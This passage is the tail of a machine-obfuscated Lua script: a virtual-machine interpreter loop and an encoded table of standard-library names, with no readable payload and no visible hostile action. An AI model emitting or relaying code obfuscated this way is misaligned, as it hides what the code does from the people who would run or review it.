d[e[w]]=d[e[f]][e[N]];n=n+o;e=x[n];d[e[i]]=d[e[f]][e[Y]];n=n+o;e=x[n];d[e[j]]=d[e[c]][e[m]];n=n+o;e=x[n];d[e[i]]=d[e[k]][e[V]];n=n+o;e=x[n];d[e[b]]=d[e[t]][e[V]];n=n+o;e=x[n];d[e[i]]=d[e[c]][e[Y]];n=n+o;e=x[n];d[e[v]][e[u]]=e[V];n=n+o;e=x[n];do return end;break;end while 1350==(l)/((3529+-0x22))do l=(6870450)while a>(3555/0x2d)do l=-l local l;d[e[b]]=d[e[k]][e[N]];n=n+o;e=x[n];d[e[b]]=d[e[k]][e[p]];n=n+o;e=x[n];d[e[h]]=d[e[t]][e[m]];n=n+o;e=x[n];d[e[v]]=d[e[s]][e[m]];n=n+o;e=x[n];d[e[i]]=d[e[c]][e[V]];n=n+o;e=x[n];d[e[i]]=d[e[t]][e[Y]];n=n+o;e=x[n];d[e[i]][e[u]]=e[p];n=n+o;e=x[n];d[e[h]]=g[e[c]];n=n+o;e=x[n];d[e[j]]=e[c];n=n+o;e=x[n];l=e[i]d[l](d[l+_])break end while(l)/((244470/0x57))==2445 do local l;d[e[b]]=d[e[k]][e[N]];n=n+o;e=x[n];d[e[v]]=d[e[s]][e[V]];n=n+o;e=x[n];d[e[h]]=d[e[k]][e[p]];n=n+o;e=x[n];d[e[h]]=d[e[k]][e[V]];n=n+o;e=x[n];d[e[h]]=d[e[k]][e[p]];n=n+o;e=x[n];d[e[h]]=d[e[u]][e[Y]];n=n+o;e=x[n];d[e[b]][e[s]]=e[p];n=n+o;e=x[n];d[e[b]]=g[e[f]];n=n+o;e=x[n];d[e[h]]=e[f];n=n+o;e=x[n];l=e[j]d[l](d[l+_])break end;break;end break;end while(l)/((0xb15+-103))==175 do l=(7597545)while a<=(0xb13/35)do l=-l local e={d,e};e[_][e[r][b]]=e[o][e[r][V]]+e[_][e[r][u]];break;end while(l)/((4496-0x8f9))==3455 do l=(2492448)while a>(-24+0x6a)do l=-l d[e[i]]=d[e[s]][e[E]];break end while(l)/(((-1-0x19)+0xe97))==672 do d[e[v]]=g[e[u]];break end;break;end break;end break;end break;end break;end break;end n=n+o;end;end);end;return P(B(),{},z())()end)_msec({[(368-0xd0)]='\115\116'..(function(e)return(e and'(-0x16+122)')or'\114\105'or'\120\58'end)((720/0x90)==(-85+0x5b))..'\110g',[((0x683-884)+-56)]='\108\100'..(function(e)return(e and'(323-0xdf)')or'\101\120'or'\119\111'end)((107-0x66)==(222/0x25))..'\112',[(0x7f38/118)]=(function(e)return(e and'(0xe2-126)')and'\98\121'or'\100\120'end)((0x7f+-122)==(124+-0x77))..'\116\101',[(0x2e5-424)]='\99'..(function(e)return(e and'(0x100-156)')and'\90\19\157'or'\104\97'end)((-0x63+104)==(-0x5b+94))..'\114',[(0x13d82/138)]='\116\97'..(function(e)return(e and'(218+-0x76)')and'\64\113'or'\98\108'end)((115-(260-0x97))==(0x21-28))..'\101',[(42098/0x61)]=(function(e)return(e and'((0x281-343)-198)')or'\115\117'or'\78\107'end)((-0x4f+82)==(0x44+-37))..'\98',[(0x2f3dc/225)]='\99\111'..(function(e)return(e and'(7400/(155+-0x51))')and'\110\99'or'\110\105\103\97'end)((181-0x96)==(65+-0x22))..'\97\116',[(0x28bae/249)]=(function(e,l)return(e and'(0x44c0/176)')and'\48\159\158\188\10'or'\109\97'end)((1010/0xca)==(84+-0x4e))..'\116\104',[(2738-0x58a)]=(function(e,l)return((0x4a1/(0x9b88/168))==(0x38-53)and'\48'..'\195'or e..((not'\20\95\69'and'\90'..'\180'or l)))or'\199\203\95'end),[(0x792-984)]='\105\110'..(function(e,l)return(e and'((0xd5c0/171)-220)')and'\90\115\138\115\15'or'\115\101'end)((0x64-95)==(-0x34+83))..'\114\116',[(-0x42+1077)]='\117\110'..(function(e,l)return(e and'(0xe9-133)')or'\112\97'or'\20\38\154'end)((73+-0x44)==(-0x2b+(0x2cce/155)))..'\99\107',[((-44+0x3f6ff)/223)]='\115\101'..(function(e)return(e and'(-56+0x9c)')and'\110\112\99\104'or'\108\101'end)((84-0x4f)==(0x3e0/32))..'\99\116',[(61965/0x33)]='\116\111\110'..(function(e,l)return(e and'(10900/0x6d)')and'\117\109\98'or'\100\97\120\122'end)((117+-0x70)==(0x3c+-55))..'\101\114'},{[(285-(0x1d8-278))]=((getfenv)or(function()return(_ENV)end))},((getfenv)or(function()return(_ENV)end))()) end)()


